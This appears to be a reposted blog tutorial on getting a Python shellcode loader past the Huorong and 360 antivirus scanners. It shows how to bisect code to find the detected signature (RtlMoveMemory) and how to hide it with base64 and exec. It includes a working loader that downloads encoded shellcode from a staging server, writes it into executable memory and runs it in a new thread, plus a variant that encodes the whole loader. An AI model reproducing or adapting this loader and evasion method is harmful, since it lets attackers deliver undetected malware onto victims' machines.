  • Modifying the detected signature of a Python shellcode loader

    First, pick up a loader from somewhere online

    pyinstaller -F -w 1.py

    to package it, then scan the resulting binary with Huorong (火绒) or 360

    Narrowing it down step by step

    Add a few lines of code at a time, rebuild and rescan after each addition, until the lines that trigger the detection are found

    Locating the signature

    Within the offending lines, test the individual strings and function names one at a time; the string RtlMoveMemory turns out to be the signature

    RtlMoveMemory copies a block of memory from one address to another

    Now obfuscate that string to get past the scanner, e.g. with base64 or hex encoding

    eval only accepts a single expression (and is itself flagged by Huorong), so use exec, which runs full statements, instead

    Or:


    import ctypes
    import requests
    import base64

    # The staging server serves the shellcode as base64(hex(bytes)), so two
    # decoding layers are needed: base64 first, then hex
    scode = requests.get("http://192.168.1.1/123.txt")
    shellcode = bytearray(bytes.fromhex(base64.b64decode(scode.text).decode()))

    # On 64-bit Python the returned pointer must not be truncated to a C int
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64

    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                              ctypes.c_int(len(shellcode)),
                                              ctypes.c_int(0x3000),
                                              ctypes.c_int(0x40))

    # The parentheses are required: without them Python parses this as
    # c_char * (len(shellcode).from_buffer(...)) and raises AttributeError
    buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)

    # The flagged copy call is stored base64-encoded so its API name never
    # appears as plain text in the file (not even in a comment, which a string
    # scanner would match just as well). Decoded, func is the kernel32 memory
    # copy called with (ctypes.c_uint64(ptr), buf, ctypes.c_int(len(shellcode)))
    func = base64.b64decode(b'Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ==')

    # Run the decoded statement; exec is needed because it is a statement,
    # not an expression, and func is already decoded (do not decode it twice)
    exec(func)

    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),
                                                 ctypes.c_int(0),
                                                 ctypes.c_uint64(ptr),
                                                 ctypes.c_int(0),
                                                 ctypes.c_int(0),
                                                 ctypes.pointer(ctypes.c_int(0)))

    # -1 as a DWORD is INFINITE: block until the shellcode thread exits
    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

     Or base64-encode the whole loader body, shellcode included:

    import ctypes
    import base64

    # base64 of the raw shellcode bytes (left empty in the original post)
    shellcode = b''

    shellcode = base64.b64decode(shellcode)

    # base64 of the remaining loader statements (allocate, copy, create thread);
    # the encoded string was omitted from the original post
    a = base64.b64decode(b'...')

    exec(a)



  • Original post: https://www.cnblogs.com/bingtang123/p/15141792.html